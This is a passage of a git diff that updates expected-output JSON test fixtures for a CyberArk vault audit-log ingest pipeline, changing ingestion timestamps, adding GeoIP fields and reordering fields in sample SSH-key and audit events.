diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-427-store-ssh-key.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-427-store-ssh-key.log-expected.json index 57f90fa6c94..6b8480832aa 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-427-store-ssh-key.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-427-store-ssh-key.log-expected.json 
@@ -62,7 +62,7 @@ "event": { "severity": 2, "action": "store ssh key", - "ingested": "2021-12-09T13:37:04.617241200Z", + "ingested": "2021-12-14T14:42:33.244627368Z", "original": "\u003c5\u003e1 2021-03-11T16:50:17Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:50:17\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:50:17Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e427\u003c/MessageID\u003e\\n \u003cDesc\u003eStore SSH Key\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eStore SSH Key\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eStore SSH Key\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:50:17\",\"IsoTimestamp\":\"2021-03-11T16:50:17Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"427\",\"Desc\":\"Store SSH Key\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Store 
SSH Key\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store SSH Key\",\"GatewayStation\":\"10.0.1.20\"}}}",
 "code": "427",
 "kind": "event"
diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-428-retrieve-ssh-key.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-428-retrieve-ssh-key.log-expected.json
index 3a02548c116..205d8cda5c7 100644
--- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-428-retrieve-ssh-key.log-expected.json
+++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-428-retrieve-ssh-key.log-expected.json
@@ -7,10 +7,19 @@
 }
 },
 "destination": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "address": "67.43.156.15",
 "user": {
 "name": "adrian"
 },
- "address": "67.43.156.15",
 "ip": "67.43.156.15"
 },
 "source": {
@@ -90,7 +99,7 @@ "event": { "severity": 2, "reason": "(Action: Retrieve SSH key)for fun and profit", - "ingested": "2021-12-09T13:37:04.741497400Z", + "ingested": "2021-12-14T14:42:33.374377913Z", "original": "\u003c5\u003e1 2021-03-11T17:43:44Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:43:44\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:43:44Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e428\u003c/MessageID\u003e\\n \u003cDesc\u003eRetrieve SSH Key\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eRetrieve SSH Key\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e(Action: Retrieve SSH key)for fun and profit\u003c/Reason\u003e\\n \u003cPvwaDetails\u003e\u003cRetrieveReason\u003e\\n \u003cGeneral\u003e\\n \u003cUserReason\u003efor fun and profit\u003c/UserReason\u003e\\n \u003cRetrieveAction\u003eRetrieve SSH key\u003c/RetrieveAction\u003e\\n \u003c/General\u003e\\n\u003c/RetrieveReason\u003e\u003c/PvwaDetails\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eRetrieve SSH Key\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n 
\u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:43:44\",\"IsoTimestamp\":\"2021-03-11T17:43:44Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"428\",\"Desc\":\"Retrieve SSH Key\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Retrieve SSH Key\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"(Action: Retrieve SSH key)for fun and profit\",\"PvwaDetails\":{\"RetrieveReason\":{\"General\":{\"UserReason\":\"for fun and profit\",\"RetrieveAction\":\"Retrieve SSH key\"}}},\"ExtraDetails\":\"\",\"Message\":\"Retrieve SSH Key\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "428", "kind": "event", 
@@ -115,10 +124,19 @@
 }
 },
 "destination": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "address": "67.43.156.15",
 "user": {
 "name": "adrian"
 },
- "address": "67.43.156.15",
 "ip": "67.43.156.15"
 },
 "source": {
@@ -201,7 +219,7 @@ "event": { "severity": 2, "reason": "(Action: Connect)testing(Connection to address: 67.43.156.15)", - "ingested": "2021-12-09T13:37:04.741505500Z", + "ingested": "2021-12-14T14:42:33.374380584Z", "original": "\u003c5\u003e1 2021-03-11T21:08:48Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 13:08:48\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T21:08:48Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e428\u003c/MessageID\u003e\\n \u003cDesc\u003eRetrieve SSH Key\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eRetrieve SSH Key\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e(Action: Connect)testing(Connection to address: 67.43.156.15)\u003c/Reason\u003e\\n \u003cPvwaDetails\u003e\u003cRetrieveReason\u003e\\n \u003cGeneral\u003e\\n \u003cUserReason\u003etesting\u003c/UserReason\u003e\\n \u003cRetrieveAction\u003eConnect\u003c/RetrieveAction\u003e\\n \u003c/General\u003e\\n \u003cConnectionDetails\u003e\\n \u003cConnectionAddress\u003e67.43.156.15\u003c/ConnectionAddress\u003e\\n \u003c/ConnectionDetails\u003e\\n\u003c/RetrieveReason\u003e\u003c/PvwaDetails\u003e\\n 
\u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eRetrieve SSH Key\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 13:08:48\",\"IsoTimestamp\":\"2021-03-11T21:08:48Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"428\",\"Desc\":\"Retrieve SSH Key\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Retrieve SSH Key\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"(Action: Connect)testing(Connection to address: 67.43.156.15)\",\"PvwaDetails\":{\"RetrieveReason\":{\"General\":{\"UserReason\":\"testing\",\"RetrieveAction\":\"Connect\"},\"ConnectionDetails\":{\"ConnectionAddress\":\"67.43.156.15\"}}},\"ExtraDetails\":\"\",\"Message\":\"Retrieve SSH Key\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "428", "kind": 
"event",
@@ -226,10 +244,19 @@
 }
 },
 "destination": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "address": "67.43.156.15",
 "user": {
 "name": "adrian"
 },
- "address": "67.43.156.15",
 "ip": "67.43.156.15"
 },
 "source": {
@@ -308,7 +335,7 @@ "event": { "severity": 2, "reason": "(Action: Retrieve SSH key)", - "ingested": "2021-12-09T13:37:04.741510100Z", + "ingested": "2021-12-14T14:42:33.374381084Z", "original": "\u003c5\u003e1 2021-03-15T13:18:52Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 06:18:52\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T13:18:52Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e428\u003c/MessageID\u003e\\n \u003cDesc\u003eRetrieve SSH Key\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eRetrieve SSH Key\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e(Action: Retrieve SSH key)\u003c/Reason\u003e\\n \u003cPvwaDetails\u003e\u003cRetrieveReason\u003e\\n \u003cGeneral\u003e\\n \u003cRetrieveAction\u003eRetrieve SSH key\u003c/RetrieveAction\u003e\\n \u003c/General\u003e\\n\u003c/RetrieveReason\u003e\u003c/PvwaDetails\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eRetrieve SSH Key\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" 
Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 06:18:52\",\"IsoTimestamp\":\"2021-03-15T13:18:52Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"428\",\"Desc\":\"Retrieve SSH Key\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Retrieve SSH Key\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"(Action: Retrieve SSH key)\",\"PvwaDetails\":{\"RetrieveReason\":{\"General\":{\"RetrieveAction\":\"Retrieve SSH key\"}}},\"ExtraDetails\":\"\",\"Message\":\"Retrieve SSH Key\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "428", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-449-create-discovery-succeeded.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-449-create-discovery-succeeded.log-expected.json index 4b6b6cb97d7..5d44024cfb6 100644 
--- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-449-create-discovery-succeeded.log-expected.json
+++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-449-create-discovery-succeeded.log-expected.json
@@ -1,18 +1,6 @@
 {
 "expected": [
 {
- "log": {
- "syslog": {
- "priority": 5
- }
- },
- "source": {
- "address": "10.0.1.20",
- "ip": "10.0.1.20"
- },
- "tags": [
- "preserve_original_event"
- ],
 "observer": {
 "product": "Vault",
 "hostname": "VAULT",
@@ -28,6 +16,11 @@
 "10.0.1.20"
 ]
 },
+ "log": {
+ "syslog": {
+ "priority": 5
+ }
+ },
 "cyberarkpas": {
 "audit": {
 "severity": "Info",
@@ -46,14 +39,21 @@ "host": { "name": "VAULT" }, + "source": { + "address": "10.0.1.20", + "ip": "10.0.1.20" + }, "event": { "severity": 2, "action": "create discovery succeeded", - "ingested": "2021-12-09T13:37:05.172001500Z", + "ingested": "2021-12-14T14:42:33.851345176Z", "original": "\u003c5\u003e1 2021-03-14T12:06:35Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:06:35\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:06:35Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e449\u003c/MessageID\u003e\\n \u003cDesc\u003eCreate Discovery Succeeded\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eCreate Discovery Succeeded\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eStatus:Success; Discovery:\u003cWindows discovery from ELASTIC.local\u003e; Reason:;\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCreate Discovery Succeeded\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 
05:06:35\",\"IsoTimestamp\":\"2021-03-14T12:06:35Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"449\",\"Desc\":\"Create Discovery Succeeded\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Create Discovery Succeeded\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"Status:Success; Discovery:\u003cWindows discovery from ELASTIC.local\u003e; Reason:;\",\"ExtraDetails\":\"\",\"Message\":\"Create Discovery Succeeded\",\"GatewayStation\":\"\"}}}",
 "code": "449",
 "kind": "event"
- }
+ },
+ "tags": [
+ "preserve_original_event"
+ ]
 }
 ]
 }
\ No newline at end of file
diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-459-general-audit.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-459-general-audit.log-expected.json
index f2db8d5101b..bd36a7963ec 100644
--- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-459-general-audit.log-expected.json
+++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-459-general-audit.log-expected.json
@@ -76,7 +76,7 @@ "event": { "severity": 2, "action": "general audit", - "ingested": "2021-12-09T13:37:05.315103200Z", + "ingested": "2021-12-14T14:42:33.961902239Z", "original": "\u003c5\u003e1 2021-03-08T10:19:42Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 02:19:42\",\"IsoTimestamp\":\"2021-03-08T10:19:42Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"459\",\"Desc\":\"General Audit\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"General Audit\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountB\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"Dual account rotation\",\"ExtraDetails\":\"DualAccountStatus=Active;Index=2;\",\"Message\":\"General Audit\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"x_accountB\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"SequenceID\",\"Value\":\"24\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"GroupName\",\"Value\":\"WindowsGroup\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1614868762\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"Index\",\"Value\":\"2\"},{\"Name\":\"DualAccountStatus\",\"Value\":\"Active\"},{\"Name\":\"VirtualUsername\",\"Value\":\"virtual\"}]}}}}", "code": "459", "kind": "event" 
@@ -158,7 +158,7 @@ "event": { "severity": 2, "action": "general audit", - "ingested": "2021-12-09T13:37:05.315115400Z", + "ingested": "2021-12-14T14:42:33.961904874Z", "original": "\u003c5\u003e1 2021-03-10T14:38:57Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 06:38:57\",\"IsoTimestamp\":\"2021-03-10T14:38:57Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"459\",\"Desc\":\"General Audit\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"General Audit\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"Dual account rotation\",\"ExtraDetails\":\"DualAccountStatus=Active;Index=1;\",\"Message\":\"General Audit\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"x_accountA\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"SequenceID\",\"Value\":\"27\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"GroupName\",\"Value\":\"WindowsGroup\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1615231204\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"Index\",\"Value\":\"1\"},{\"Name\":\"DualAccountStatus\",\"Value\":\"Active\"},{\"Name\":\"VirtualUsername\",\"Value\":\"virtual\"}]}}}}", "code": "459", "kind": "event" 
@@ -241,7 +241,7 @@ "event": { "severity": 2, "action": "general audit", - "ingested": "2021-12-09T13:37:05.315123500Z", + "ingested": "2021-12-14T14:42:33.961908261Z", "original": "\u003c5\u003e1 2021-03-14T11:48:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 04:48:26\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T11:48:26Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e459\u003c/MessageID\u003e\\n \u003cDesc\u003eGeneral Audit\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eGeneral Audit\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eTest\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountB\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eDual account rotation\u003c/Reason\u003e\\n \u003cExtraDetails\u003eDualAccountStatus=Active;Index=2;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eGeneral Audit\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDesktopLocal\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"x_accountB\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty 